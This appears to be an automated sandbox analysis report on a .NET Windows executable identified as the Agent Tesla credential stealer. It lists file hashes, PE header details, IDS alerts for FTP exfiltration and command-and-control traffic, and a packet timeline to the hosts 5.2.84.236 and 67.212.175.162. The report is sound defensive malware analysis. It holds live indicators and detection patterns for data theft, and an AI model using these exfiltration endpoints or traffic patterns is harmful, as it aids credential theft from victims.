                                                        SSDEEP:24576:pcid/6VwqvqxO7eeuDy/3gQovH9k+wMANi2Cc0QTDy22k/X37DNO7w6qIGigNKpM:v6owTwRSJXMdSbIl9Lo5qGnzQ9g
                                                        TLSH:D1D5E507B686DBB2C14D1777C587C406E361D5877713E71B39CA2BB90983BAA8E861C3
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r..f..................,...........-.. ... -...@.. .......................`-...........`................................
                                                        Icon Hash:90cececece8e8eb0
                                                        Entrypoint:0x6d04fe
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x66FF9272 [Fri Oct 4 07:00:02 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2d04b0 | 0x4b | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d2000 | 0x580 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2d4000 | 0xc | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x2000 | 0x2ce504 | 0x2ce600 | 46083e59814e642877d8012811f06c25 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0x2d2000 | 0x580 | 0x600 | 9bd26a9d7701a43685908f08eff83fe7 | False | 0.4108072916666667 | data | 3.95405782758847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0x2d4000 | 0xc | 0x200 | cd79eb7a65291a0b8ea5e0b2668db4a7 | False | 0.041015625 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        RT_VERSION | 0x2d20a0 | 0x32c | data | | | 0.4236453201970443
                                                        RT_MANIFEST | 0x2d23cc | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385
                                                        DLL | Import
                                                        mscoree.dll | _CorExeMain
                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                        2024-10-07T09:13:37.746922+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49731 | 5.2.84.236 | 21 | TCP
                                                        2024-10-07T09:13:38.457461+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49732 | 5.2.84.236 | 61569 | TCP
                                                        2024-10-07T09:13:38.462799+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49732 | 5.2.84.236 | 61569 | TCP
                                                        2024-10-07T09:13:49.942457+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49735 | 5.2.84.236 | 21 | TCP
                                                        2024-10-07T09:13:50.650246+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49740 | 5.2.84.236 | 50003 | TCP
                                                        2024-10-07T09:13:50.656811+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49740 | 5.2.84.236 | 50003 | TCP
                                                        2024-10-07T09:13:57.535391+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49743 | 5.2.84.236 | 21 | TCP
                                                        2024-10-07T09:13:58.222414+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49744 | 5.2.84.236 | 49640 | TCP
                                                        2024-10-07T09:13:58.227737+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49744 | 5.2.84.236 | 49640 | TCP
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Oct 7, 2024 09:13:32.635262012 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.635288954 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.635297060 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.635319948 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.635351896 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.652481079 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.652570963 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.652617931 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.652622938 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.652643919 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.652688980 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.652695894 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.652708054 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.652771950 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.652889967 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.652942896 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.653229952 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.653307915 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.653458118 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.653516054 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.653559923 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.653625965 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.653723955 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.653778076 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.654005051 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.654062033 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.654222965 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.654325008 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.654336929 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.654392958 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.654985905 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.655047894 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.655168056 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.655270100 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.655421019 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.655483961 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.676415920 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.676558971 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.725238085 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.725321054 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.726007938 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.726074934 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.741138935 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.741260052 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.741317034 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.741368055 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.741425991 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.741472960 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.741594076 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.741645098 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.742041111 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.742096901 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.742209911 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.742312908 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.742366076 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.742405891 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.742559910 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.742640018 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.743490934 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.743537903 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.743568897 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.743613005 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.743844032 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.743895054 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.744015932 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.744064093 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.744196892 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.744328976 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.765229940 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.765373945 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.813855886 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.813916922 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.814012051 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.814028025 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.814042091 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.814076900 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.829641104 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.829754114 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.829777956 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.829793930 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.829818964 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.829852104 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.829933882 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.829993010 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.830173016 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.830224037 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.830594063 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.830641031 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.830862045 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.830909014 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.831023932 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.831073046 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.831176996 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.831228018 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.831597090 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.831645966 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.831710100 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.831753016 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.832444906 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.832509995 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.832725048 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.832834959 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.832915068 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.832961082 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.853801966 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.853933096 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.902579069 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.902643919 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.902805090 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.902822971 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.902879953 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.918628931 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.918710947 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.918771982 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.918780088 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.918800116 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.918823004 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.918823004 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.918829918 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.918873072 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.918941975 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.919056892 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.919298887 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.919346094 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.919708967 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.919790983 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.919909000 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.919976950 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.920010090 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.920056105 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.920101881 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.920164108 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.920330048 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.920403957 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.920485973 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.920835018 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.921184063 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.921262026 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.921403885 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.921492100 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.921626091 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.921726942 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.942583084 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.942754984 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.991523027 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.991697073 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:32.991713047 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:32.991775036 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.007441998 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.007544994 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.007556915 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.007689953 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.007713079 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.007718086 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.007741928 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.007819891 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.007858992 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.007916927 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.008331060 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.008389950 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.008810997 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.008871078 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009042025 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009093046 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009149075 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009206057 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009361982 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009412050 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009488106 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009829998 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009850979 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009855032 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009876013 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009897947 CEST4434973067.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:33.009907961 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.009944916 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:33.019592047 CEST49730443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:35.353775024 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:35.358617067 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:35.362174988 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:36.050350904 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.050604105 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:36.055429935 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.309659004 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.309820890 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:36.315190077 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.663338900 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.663503885 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:36.668422937 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.922656059 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:36.922807932 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:36.927807093 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.181900978 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.182140112 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:37.186943054 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.441587925 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.441781998 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:37.446542978 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.740680933 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.741725922 CEST4973261569192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:37.746551991 CEST61569497325.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:37.746628046 CEST4973261569192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:37.746922016 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:37.751697063 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:38.457134962 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:38.457461119 CEST4973261569192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:38.457511902 CEST4973261569192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:38.462392092 CEST61569497325.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:38.462721109 CEST61569497325.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:38.462799072 CEST4973261569192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:38.506279945 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:38.716300011 CEST21497315.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:38.771631002 CEST4973121192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:42.952534914 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:42.952635050 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:42.952718019 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:42.996880054 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:42.996907949 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.593029022 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.593115091 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.594746113 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.594752073 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.594986916 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.645559072 CEST49733443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:43.687410116 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:43.770335913 CEST4434973367.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:48.387826920 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:48.388324022 CEST4973521192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:48.388577938 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:48.388683081 CEST4973521192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:48.598280907 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:48.598463058 CEST4973521192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:48.598854065 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:48.880084038 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:48.880250931 CEST4973521192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:48.885078907 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:49.144174099 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:49.144337893 CEST4973521192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:49.149244070 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:49.408490896 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:49.408658981 CEST4973521192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:49.413460016 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:49.672302961 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:49.672904015 CEST4973521192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:49.677664995 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:49.936832905 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:49.937458038 CEST4974050003192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:49.942260027 CEST50003497405.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:49.942332983 CEST4974050003192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:49.942456961 CEST4973521192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:49.947230101 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:50.650012016 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:50.650245905 CEST4974050003192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:50.650348902 CEST4974050003192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:50.655935049 CEST50003497405.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:50.656766891 CEST50003497405.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:50.656810999 CEST4974050003192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:50.691548109 CEST4973521192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:50.931509972 CEST21497355.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:50.974800110 CEST4973521192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:51.536695004 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:51.536746025 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:51.536817074 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:51.541631937 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:51.541667938 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.052278042 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.052361965 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.056818008 CEST49742443192.168.2.467.212.175.162
